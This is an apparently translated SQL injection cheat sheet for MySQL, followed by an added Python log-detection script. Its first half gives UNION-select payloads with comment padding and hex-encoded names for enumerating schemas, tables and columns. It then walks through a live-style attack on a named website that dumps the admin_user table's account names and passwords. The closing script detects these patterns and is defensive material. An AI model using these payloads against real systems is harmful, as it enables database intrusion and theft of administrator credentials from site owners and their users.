Enumerate databases
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerate tables
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<hex value of the database name>/**/limit/**/1,1

Enumerate columns
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<hex value of the table name>/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables

An example follows:

1. Dump table names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hexadecimal encoding of the database name yd_teamnet)
Stepping through the results this way, the admin_user table appeared at the fourth one.

2. Dump column names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
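
On the defending side, the requests in steps 1 to 3 share a shape that is easy to find in web server logs once the /**/ padding and the hex-encoded names are undone. The following is an added example, not part of the original post: a small log-triage check in Python, where the host app.example, the path item.php, the rule names and the sample requests are all constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Indicators taken from the payload shapes on this page (rule names are hypothetical).
RULES = {
    "union_select": re.compile(r"\bunion\s+select\b"),
    "information_schema": re.compile(r"\binformation_schema\.(schemata|tables|columns)\b"),
    "hex_literal": re.compile(r"\b0x(?:[0-9a-f]{2}){4,}\b"),
    "always_false_guard": re.compile(r"\band\s+1\s*=\s*2\b"),
}

def normalize(value):
    """Undo the /**/ whitespace substitution, then collapse spaces and lowercase."""
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)  # closed inline comments
    value = re.sub(r"/\*.*$", " ", value, flags=re.S)     # unterminated trailing /*
    return re.sub(r"\s+", " ", value).strip().lower()

def decode_hex_literals(text):
    """Decode 0x... literals so an analyst sees which schema or table was named."""
    out = []
    for m in RULES["hex_literal"].finditer(text):
        raw = bytes.fromhex(m.group(0)[2:])
        out.append(raw.decode("ascii", errors="replace"))
    return out

def inspect_url(url):
    """Return {param: {"hits": [...], "decoded": [...]}} for suspicious parameters."""
    findings = {}
    # parse_qsl percent-decodes values, so encoded padding is handled as well.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        text = normalize(value)
        hits = sorted(rule for rule, rx in RULES.items() if rx.search(text))
        if hits:
            findings[name] = {"hits": hits, "decoded": decode_hex_literals(text)}
    return findings

# Constructed sample requests (hypothetical host and path, not real log data).
SAMPLES = [
    "http://app.example/item.php?id=42&page=2",
    "http://app.example/item.php?id=-1/**/UNION/**/SELECT/**/1,TABLE_NAME,3/**/"
    "FROM/**/information_schema.TABLES/**/WHERE/**/TABLE_SCHEMA=0x73686f70/**/LIMIT/**/0,1/*",
    "http://app.example/item.php?id=7%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1,2",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(inspect_url(url) or "clean", "<-", url)
```

A hit on a parameter that should only ever hold an integer is the signal to review that endpoint; the fix there is a parameterized query or an integer cast, with log matching kept as a detection aid.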